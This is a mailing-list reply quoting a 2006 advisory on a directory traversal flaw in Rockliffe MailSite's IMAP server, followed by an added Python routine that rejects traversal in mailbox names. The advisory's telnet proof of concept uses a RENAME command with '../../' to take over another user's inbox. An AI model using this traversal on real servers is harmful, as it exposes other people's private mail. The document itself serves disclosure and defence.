Seeing as most IMAP servers allow you to use ../../ with SELECT, etc. (think uw-imapd for example), I think I would categorize this as more of a permissions problem.
-sb

On 1/4/06, Josh Zlatin <[EMAIL PROTECTED]> wrote:
> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
>
> Product: Rockliffe Mailsite
> http://www.rockliffe.com
>
> Version: Confirmed on Mailsite < 6.1.22.1
>
> Author: Josh Zlatin-Amishav
>
> Date: January 4, 2006
>
> Background:
> Rockliffe MailSite secure email server software and MailSite MP secure email
> gateways provide email server solutions and gateway email protection for
> businesses and service providers. Rockliffe has more than 3,000 customers
> hosting more than 15 million mailboxes worldwide.
>
> Issue:
> In working with researchers at Tenable Network Security, I have come across
> a directory transversal flaw in the IMAP server. It is possible for an
> authenticated user to access any user's inbox via a RENAME command.
>
> PoC:
>
> [EMAIL PROTECTED]:~$ telnet 10.0.0.5 143
> Trying 10.0.0.5...
> Connected to 10.0.0.5.
> Escape character is '^]'.
> * OK MailSite IMAP4 Server 6.1.22.0 ready
> a1 login joe pass
> a1 OK LOGIN completed
> a2 rename ../../josh/INBOX gotcha
> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> a3 select gotcha
> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> * 0 EXISTS
> * 0 RECENT
> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> * OK [UNSEEN 0]
> * OK [UIDVALIDITY 514563061] UIDs are valid
> a3 OK [READ-WRITE] opened gotcha
>
> user joe can now access the contents of user josh's INBOX directory.
>
> Vendor notified: January 3, 2006 06:12AM
>
> Vendor Response:
> Contact your sales rep about purchasing Mailsite 7.0.3.1
>
> Solution:
> Mailsite fixed a buffer overrun in the Mailsite IMAP server which also fixes
> the directory transversal problem. Either upgrade to version 6.1.22 and install
> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
> Mailsite. The hotfix can be obtained at:
>
> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>
> References: http://www.rockliffe.com
> References:
> http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
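
A server-side check that would refuse the `rename ../../josh/INBOX gotcha` request from the PoC above, as an added example (not part of the original thread and not MailSite's code). The `<store_root>/<user>/<mailbox>` layout, the function names and the sample paths are assumptions made for illustration, and `user` is assumed to come from the authenticated session.

```python
import posixpath


class MailboxNameError(ValueError):
    """Raised when a client-supplied mailbox name would leave the user's root."""


def resolve_mailbox(store_root, user, name):
    """Map an IMAP mailbox name to a path under <store_root>/<user>/.

    The on-disk layout is hypothetical; `user` is the authenticated login,
    never a value taken from the command arguments.
    """
    if not name or "\x00" in name:
        raise MailboxNameError("empty name or NUL byte")
    # Treat both separators alike so "..\\..\\x" is handled like "../../x".
    parts = name.replace("\\", "/").split("/")
    if parts[0] == "" or ":" in parts[0]:
        raise MailboxNameError("absolute path or drive prefix")
    if any(p in ("", ".", "..") for p in parts):
        raise MailboxNameError("empty, '.' or '..' path component")
    user_root = posixpath.normpath(posixpath.join(store_root, user))
    candidate = posixpath.normpath(posixpath.join(user_root, *parts))
    # Defence in depth: the normalised path must still sit under the user's root.
    if posixpath.commonpath([user_root, candidate]) != user_root:
        raise MailboxNameError("resolved path escapes user root")
    return candidate


def check_rename(store_root, user, old, new):
    """Validate BOTH arguments of RENAME before the store is touched."""
    return (resolve_mailbox(store_root, user, old),
            resolve_mailbox(store_root, user, new))


def rename_allowed(store_root, user, old, new):
    try:
        check_rename(store_root, user, old, new)
        return True
    except MailboxNameError:
        return False


if __name__ == "__main__":
    root = "/var/mailstore"  # constructed sample path
    for old, new in [("Drafts/2005", "Archive"), ("../../josh/INBOX", "gotcha")]:
        print(old, "->", new, ":", rename_allowed(root, "joe", old, new))
```

The same resolver belongs in front of every command that takes a mailbox name (SELECT, CREATE, DELETE, and so on), so name handling and per-user access are enforced in one place.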
